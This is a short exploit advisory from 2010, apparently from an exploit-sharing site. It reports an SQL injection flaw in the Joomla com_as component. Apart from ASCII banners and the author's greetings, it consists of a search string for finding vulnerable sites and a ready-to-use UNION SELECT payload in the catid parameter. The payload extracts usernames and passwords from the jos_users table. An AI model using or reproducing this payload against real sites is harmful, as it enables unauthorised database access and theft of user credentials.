# Title:Joomla com_as Sql Injection Vulnerability
# Author: N2n-Hacker
# Date:2010-03-11
# Script:   --[Joomla]--


#########################################################################
#########################################################################

                [ Joomla com_as Sql Injection Vulnerability ]

                     N2n-Hacker m9awda 3lya from Algeria

                            mizirya o tahya ljazayer
#########################################################################
#########################################################################


# Searching:index.php?option=com_as&as=100

# exploiting: http://www.site.com/joomlascript/index.php?option=com_as&as=100&catid=[Here Put Your Sql Injection Query]--

==> http://www.site.com/joomlascript/index.php?option=com_as&as=100&catid=-20 UNION SELECT 1,2,3,concat(username,0x3a,password)...+from+jos_users--

            \\\\\\\\\\\\\\\\\\ khfif drif //////////////////

#########################################################################
                    My Bad Life But Not For4ver nchallah
#########################################################################